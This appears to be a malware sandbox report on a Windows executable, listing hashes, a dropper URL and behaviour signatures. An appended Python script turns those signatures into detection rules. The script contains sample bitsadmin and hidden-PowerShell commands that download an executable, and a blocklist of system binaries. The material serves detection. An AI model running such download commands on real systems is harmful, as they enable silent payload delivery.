General

  • Target

    146fb98d6e239d844dee837aa55ff873d0599d2af7400a1b6fba74ee0eb5c7c3.exe

  • Size

    301KB

  • Sample

    240821-lrj2lavglp

  • MD5

    bbbd7535034d9bb440dd2b71c724b1e9

  • SHA1

    3cac48e520e29055e37e32823e8e8c1db8c7da4d

  • SHA256

    146fb98d6e239d844dee837aa55ff873d0599d2af7400a1b6fba74ee0eb5c7c3

  • SHA512

    f05c6f43182dcd9221dba3bed02214ada5092abbe6a725e8e6cdb092dd587e058c8f69ecd79d5bcc93ae631e9451d2b3a6b4f99f820763aa148c56fa40a32960

  • SSDEEP

    6144:ctL5/GB1/J3Vyg7EzpZVo7hvnZUKWuP2PuSKk/Iu3+EHx:q/u58nzpZW7ncurSKkAu9Hx

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Source

  • URLs

    exe.dropper: https://chocolatey.org/7za.exe


Targets

    • Target

      146fb98d6e239d844dee837aa55ff873d0599d2af7400a1b6fba74ee0eb5c7c3.exe


    Score
    10/10
    • Blocklisted process makes network request

    • Download via BitsAdmin

    • Checks computer location settings

      Looks up the country code configured in the registry, likely used as a geofence.
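As an added example, not part of the sandbox report or its tooling, the Python below turns the report's four signatures (blocklisted process making a network request, download via BitsAdmin, the PowerShell exe.dropper stage, and the country-code registry lookup) into detection logic that runs over constructed Sysmon-style telemetry. The event records, the blocklist of system binaries, and the registry value used for the country lookup (HKCU\Control Panel\International\Geo\Nation) are assumptions; the report does not show the exact values its signatures test. One caveat worth carrying into any rule derived from this report: the extracted URL https://chocolatey.org/7za.exe is the Chocolatey package repository serving 7za.exe, the file name of 7-Zip's standalone console executable, so the dropper stage pulls a legitimate archiver rather than a hostile payload, and the URL on its own is a weak indicator compared with the behaviours below.

```python
import re

# Constructed Sysmon-style events standing in for a task's process, registry
# and network telemetry. Illustrative only; not copied from the report's tasks.
SAMPLE_EVENTS = [
    {"id": 1, "type": "ProcessCreate",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority normal https://chocolatey.org/7za.exe C:\Users\Public\7za.exe"},
    {"id": 2, "type": "ProcessCreate",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe','C:\Users\Public\7za.exe')"},
    {"id": 3, "type": "RegistryRead",
     "image": r"C:\Users\Public\sample.exe",
     "key": r"HKCU\Control Panel\International\Geo\Nation"},
    {"id": 4, "type": "NetworkConnect",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest": "chocolatey.org", "port": 443},
    {"id": 5, "type": "ProcessCreate",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"id": 6, "type": "NetworkConnect",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest": "example.org", "port": 443},
]

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)

# Assumed blocklist of system binaries that should not normally open outbound
# connections; the report does not enumerate the list behind its signature.
NETWORK_BLOCKLIST = {"powershell.exe", "pwsh.exe", "bitsadmin.exe", "certutil.exe",
                     "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe",
                     "cscript.exe"}

# Download primitives commonly seen in PowerShell one-liners (lower-cased).
DOWNLOAD_PRIMITIVES = ("downloadfile", "downloadstring", "invoke-webrequest",
                       "iwr ", "start-bitstransfer", "curl ", "wget ")

# Assumed registry locations for the configured country code; the report's
# signature text does not name the exact value it reads.
GEO_KEYS = (r"control panel\international\geo\nation",
            r"control panel\international\scountry")


def extract_urls(text):
    """Return every http(s) URL found in a command line."""
    return URL_RE.findall(text or "")


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_bitsadmin_download(ev):
    """Download via BitsAdmin: bitsadmin.exe with a transfer verb and a URL."""
    if ev["type"] != "ProcessCreate" or basename(ev["image"]) != "bitsadmin.exe":
        return False
    cmd = ev["cmdline"].lower()
    return ("/transfer" in cmd or "/addfile" in cmd) and bool(extract_urls(cmd))


def rule_exe_dropper(ev):
    """exe.dropper: PowerShell fetching a URL whose path ends in .exe."""
    if ev["type"] != "ProcessCreate" or basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return False
    cmd = ev["cmdline"].lower()
    exe_urls = [u for u in extract_urls(cmd) if u.split("?")[0].endswith(".exe")]
    return bool(exe_urls) and any(p in cmd for p in DOWNLOAD_PRIMITIVES)


def rule_geo_lookup(ev):
    """Checks computer location settings: read of the configured country code."""
    return ev["type"] == "RegistryRead" and any(k in ev["key"].lower() for k in GEO_KEYS)


def rule_blocklisted_network(ev):
    """Blocklisted process makes network request."""
    return ev["type"] == "NetworkConnect" and basename(ev["image"]) in NETWORK_BLOCKLIST


RULES = {
    "Download via BitsAdmin": rule_bitsadmin_download,
    "exe.dropper URL in PowerShell": rule_exe_dropper,
    "Checks computer location settings": rule_geo_lookup,
    "Blocklisted process makes network request": rule_blocklisted_network,
}


def triage(events):
    """Return [(rule_name, event_id)] for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev["id"]))
    return hits


def dropper_urls(events):
    """URLs seen in download commands: the equivalent of the report's extracted config."""
    urls = set()
    for ev in events:
        if rule_bitsadmin_download(ev) or rule_exe_dropper(ev):
            urls.update(extract_urls(ev["cmdline"]))
    return sorted(urls)


if __name__ == "__main__":
    for name, eid in triage(SAMPLE_EVENTS):
        print(f"event {eid}: {name}")
    print("dropper URLs:", dropper_urls(SAMPLE_EVENTS))
```

The rules deliberately key on behaviour (which binary ran, with which verb, reading which value) rather than on the hostname, so they still fire when the same dropper is repointed at a different download location.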

MITRE ATT&CK Enterprise v15

Tasks